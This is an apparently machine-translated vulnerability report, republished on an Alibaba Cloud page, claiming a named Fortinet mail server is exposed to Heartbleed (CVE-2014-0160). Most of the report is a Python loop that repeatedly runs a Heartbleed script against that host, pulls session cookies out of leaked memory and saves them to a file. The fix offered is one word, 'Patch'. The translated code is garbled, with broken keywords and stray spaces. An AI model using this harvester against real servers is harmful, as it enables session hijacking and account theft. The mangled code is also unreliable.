Fortinet email server can capture account cookies

Source: Internet
Author: User

Fortinet email server can capture account cookies

Fortinet mailbox server url: https://mail.fortinet.com.cn
Vulnerable port: 443
The port has a CVE-2014-0160-heartbleed vulnerability that can read 64 KB of server memory each time
The first is the openssl. py test information:

You can see the account cookie. You can use the following script to continuously capture the cookie:
 

Import osimport reimport timeaccounts = [] while True: result = OS. popen ('openssl. py mail.fortinet.com.cn '). read () matches = re. findall ('session1 = (. *?);. *? OKIE = (Era .*? % 3D % 3D % 0A) ', result) for match in matches: if match not in accounts: accounts. append (match) with open('accounts.txt ', 'A') as inFile: inFile. write (str (match) + '\ n') print 'new Account:', match time. sleep (1.0)

For a short time, there will be three:



Solution:
Patch
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.